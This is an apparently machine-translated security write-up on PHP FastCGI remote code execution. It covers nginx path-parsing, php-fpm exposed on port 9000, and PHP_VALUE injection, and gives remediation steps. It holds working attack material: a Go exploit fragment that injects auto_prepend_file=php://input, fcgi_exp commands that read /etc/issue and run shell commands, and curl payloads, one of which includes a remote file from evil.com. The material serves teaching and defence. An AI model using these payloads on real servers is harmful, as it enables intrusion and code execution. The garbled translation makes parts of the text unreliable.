PHP FastCGI RCE Vul

Source: Internet
Author: User
Tags nginx server
Catalog

1 . Introduction 2 . nginx file Type error parsing vulnerability 3. fast-for direct public network opening CGI attacks 4. FCGI API dynamically modifies configuration in php.ini to implement RCE

1. Introduction

Let's start by combing the concept of CGI.

1 . CGICGI is to ensure that the data passed by Web server is in standard format, which is essentially a protocol standard. Web server, such as Nginx, is simply the publisher of the content. Like 1) If the request/ index.html, then Web server will go to the file system to find this file, sent to the browser, where the static data is distributed 2) If the request is/ index.php, according to the configuration file, Nginx know that this is not a static file, need to find a PHP parser to deal with, then he will make this request simple processing to the PHP parser problem is the core of the nginx need to pass what data to the PHP parser, for example 1 ) URL 2 ) Query string 3 ) Post Data 4 ) HTTP Header: In essence, CGI is the protocol that specifies what data to pass to the rear to handle the request, and, as long as it is a program that follows this protocol standard, it can be called a CGI program . 2 . FastCGI first to be clear, fastcgi is also a protocol standard, FASTCGI is designed to improve the performance of CGI programs 1 First, fastcgi will start a master, parse the configuration file, initialize the execution environment 2 ) and then start multiple worker 3 when the request comes in, master is passed to a worker, and immediately the next request can be accepted. This avoids repetitive labor and improves efficiency. 4 and when the worker is not enough, master can pre-boot several workers according to the configuration and so on, and if you find that the idle worker too much, will also stop some, so as to improve performance, but also save resources and corresponds to, as long as the protocol is followed by the standard implementation of the program , you can call it a fastcgi program. 3. php-cgi/php- fastcgiphp's interpreter is PHP-cgi,php- CGI is only a CGI program, he himself can only parse the request, return the results, will not process management 4. php-fpmphp-FPM is the manager of the php-cgi process, which manages the php-cgi process, and the PHP-FPM management object is php-cgi

0X1:PHP-FPM

The PHP-FPM features include

1. Supports smooth stop/ Advanced Process Management features launched 2. Can work in different Uid/gid/ chroot environment, and listen to different ports and use different php.ini configuration files (can replace the settings of Safe_mode) 3 . StdOut, stderr log records 4 The ability to restart and cache corrupted opcode in the event of an unexpected situation 5 . File Upload optimization support 6. " Slow Log "- Record scripts (not only file names, but also PHP backtrace information that can be used by ptrace or similar tools to read and analyze the running data of remote processes), resulting in unusually slow operation 7. Fastcgi_finish_request ()- Special features: To continue to perform time-consuming work in the background after the request finishes and refreshes the data (input video conversion, statistics processing, etc.) 8 . Dynamic/static child process generation 9 . Basic SAPI Run status information (Apache-like Mod_status) Ten. PHP.ini-based configuration files

relevant Link:

http // php.net/manual/zh/install.fpm.configuration.phphttp // php.net/manual/zh/install.fpm.phphttp // segmentfault.com/q/1010000000256516

2. nginx file type Error parsing vulnerability

0x1: Vulnerability Description

Vulnerability Description: Nginx is a high-performance Web server, the use of a very broad, not only often used as a reverse proxy, but also very good support for PHP operation. However, there is a serious security problem, which by default may cause server errors to parse any type of file in PHP, which will lead to serious security issues that could allow a malicious attacker to compromise an nginx server that supports PHP.

0x2: Vulnerability Analysis

Nginx supports PHP's operation by default in CGI mode, which is configured as follows in the configuration file.

Location ~ . php$ {root html; Fastcgi_pass 127.0. 0.1: 9000 ; fastcgi_index index.php; Fastcgi_param script_filename/ scripts$fastcgi_script_name; include Fastcgi_params;}

The configuration parameters are briefly described below

1 A URI environment variable is used to select when a request is selected 1 The key variable passed to the backend fastcgi Script_filename determined by the Nginx-generated $fastcgi_script_name 2 and through the analysis you can see that the $fastcgi_script_name is directly controlled by the URI environment variable. 2. Here is the point where the problem arises. In order to better support the extraction of path_info, there is a cgi.fix_pathinfo option in the PHP configuration option, which is designed to remove the real script name from the Script_filename.

Let's assume an attack scenario.

1. Suppose there is a url:http: // localhost/test/test.jpg 2. We have access to the following ways: http: // localhost/test/test.jpg/test.php 3. Nginx will get a URI:/test.jpg/ test.php 4. After the location instruction, the request will be given to the backend fastcgi processing, Nginx set the environment variable script_filename, the content is:/scripts/test.jpg/ test.php 5 The fastcgi of the backend when this option is accepted, the Fix_pathinfo configuration determines whether additional processing is performed on the script_filename, typically if the fix_pathinfo is not set to affect the use of path_ Info is used for routing, so this option is generally configured to open. PHP through this option will find the real script file name, look for the way to see if the file exists, this time will be separated out script_filename and Path_info respectively 1) Script_filename:/scripts/ test.jpg 2 ) PATH_INFO:test.php 6. Finally, with/scripts/test.jpg as the script to be executed for this request, Nginx will use the PHP parser to process the JPG file, and the attacker can enable Nginx to parse any type of file in PHP.

the nature of the vulnerability is actually due to the fact that fcgi and webserver have different understandings of the script path-level parameters, which is typically caused by different interpretations of the same request due to different cross-system contexts, and its attack surface is an nginx with this vulnerability.

0x3:poc

Access to a Nginx support PHP site, in a file of any resource, such as robots.txt after adding/test.php, this arbitrary resource file will be executed as a PHP file

0x4: Repair scenario (requires reboot)

1 . Modify the php.ini configuration Cgi.fix_pathinfo= 0 2 add the. Nginx configuration file if($fastcgi _script_name ~. */.* PHP) { return 403 ;} /* given the MVC framework and the potential for xxx/xx.php in user-defined sites, this rule should be more granular, such as *.jpg/.*php, *.txt/.*php */

In addition, Nginx can be hotreload in the case of no need to restart the configuration file

Service Nginx Reload // or/etc/init.d/nginx Reload

0x5: Repair solution (no restart required)

The premise is that the target server simultaneously exists FCGI API exposes the vulnerability of public network, using hotfix's repair idea, using the fcgi itself can be Rce's characteristics, using RCE to modify the vulnerability of the machine's fcgi vulnerability

1 configuration of Nginx configuration file for Target server modified with fcgi rce Vulnerability if($fastcgi _script_name ~. */.* PHP) { return 403 ;} 2 the value of PHP.ini is dynamically modified using fcgi rce Vulnerability Cgi.fix_pathinfo= 0

relevant Link:

http // www.80sec.com/nginx-securit.htmlhttp // php.net/manual/zh/ini.core.php

3. fast-cgi attack against direct public network opening

In addition to the use of Nginx file Parsing vulnerability, because fcgi and webserver communication through the network, so now more and more clusters will be fcgi directly tied to the public network, everyone can access it. This means that anyone can pretend to be webserver and let fcgi execute the script content we want to execute. We use PHP-FPM (PHP's fast-cgi implementation) as an example of the security risks associated with exposing fastcgi directly to the public network.

0x1: Affected range Scan

/* 1. PHP-FPM The default listener port is 90002. The reason for using SV is that because there may be other services on port 9000, we need to use nmap fingerprint identification to help us identify it first. */ Nmap-sv-p 9000--open 173. xxx.xxx. 1/ -

0x2:fcgi Hijacking POC

Because webserver in order to provide fastcgi some parameters, each time the request is forwarded, the Fastcgi_params package is passed to the fcgi process. Originally these parameters are the user is not controllable, but since this fcgi open to the outside, it also means that we can set these parameters, let us do something that could not be done

./FCGI_EXP Read 173. xxx.xxx. 183 9000/etc/ Issue /* 1. In Fastcgi_params, set Document_root to "/" root directory 2. Set Script_filename to/etc/issue3. So as long as we have permission, We can control the fcgi to read any file on this machine. It's not actually read, it's done with PHP. */

Fcgi_exp.go

.. ENV:= Make (map[ string] string ) env[ " Script_filename "] = urlenv[ " Document_root "] = " / " env[ " Server_software "] = " go/fcgiclient " env[ " REMOTE_ADDR "] = " 127.0.0.1 " env[ " Server_protocol "] = " http/1.1 " ifLen (reqparams)! = 0 {env[ " content_length "] = StrConv. Itoa (Len (reqparams)) env[ " Request_method "] = " POST " env[ " Php_value "] = " allow_url_include = on\ndisable_functions = \nsafe_mode = Off\nauto_prepend_file = Php://input " } Else {env[ " Request_method "] = " GET " }..

0x3: Attack vectors

1 similar to a common Lfi vulnerability, if you know the log path on this machine, or any file path that you can control the content, you can execute arbitrary code. // for knowledge about converting Lfi vulnerabilities to RCE, see another article: http://www.cnblogs.com/LittleHann/p/3665062.html 2. Dynamically modifies the value of Auto_prepend_file in php.ini to remotely execute arbitrary files. To turn a lfi loophole into an RFI.

0x4: Repair Solution

1 do not expose the fcgi interface to the public network. 2. An authentication mechanism is added to the fcgi

4. Use FCGI API to dynamically modify configurations in php.ini to implement RCE

0x1: Attack vectors

Universal by setting Fastcgi_params, we can use Php_admin_value and php_value to dynamically modify PHP settings

env[ " Request_method "] = " POST " env[ " Php_value "] = " auto_prepend_file = Php://input " env[ " Php_admin_value "] = " allow_url_include = on\ndisable_functions = \nsafe_mode = Off "

Execute the Php://input, then write our PHP code in the Post's content, so that you can directly execute the

./fcgi_exp System 127.0. 0.1 9000/tmp/a.php " ID; uname-a "

0x2:poc

1 . Local contains direct execution code: Curl-H " user-agent: "http // Target.com/test.php?-dauto_prepend_file%3d/proc/self/environ+-n 2 . Remote contains execution code: Curl http: // Target.com/test.php?-dallow_url_include%3don+-dauto_prepend_file%3dhttp%3a%2f%2fwww.evil.com%2fevil.txt // -D parameter: The function is to define an INI value for PHP

0x2: Fix it

1 . Do not expose the fcgi interface to the public (important) 2 . Add an authentication mechanism to fcgi 3 . Upgrade PHP CGI

Relevant Link:

http: span>// zone.wooyun.org/content/1060 http: // ZONE.WOOYUN.ORG/CONTENT/15 1 http: // eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/

Ptimes New Roman ', Times,sans-serif; Font-size:14px ">

Above introduces PHP FastCGI RCE Vul, including aspects of the content, I hope to be interested in PHP tutorial friends helpful.

  • Contact Us

    The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

    If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

    A Free Trial That Lets You Build Big!

    Start building with 50+ products and up to 12 months usage for Elastic Compute Service

    • Sales Support

      1 on 1 presale consultation

    • After-Sales Support

      24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.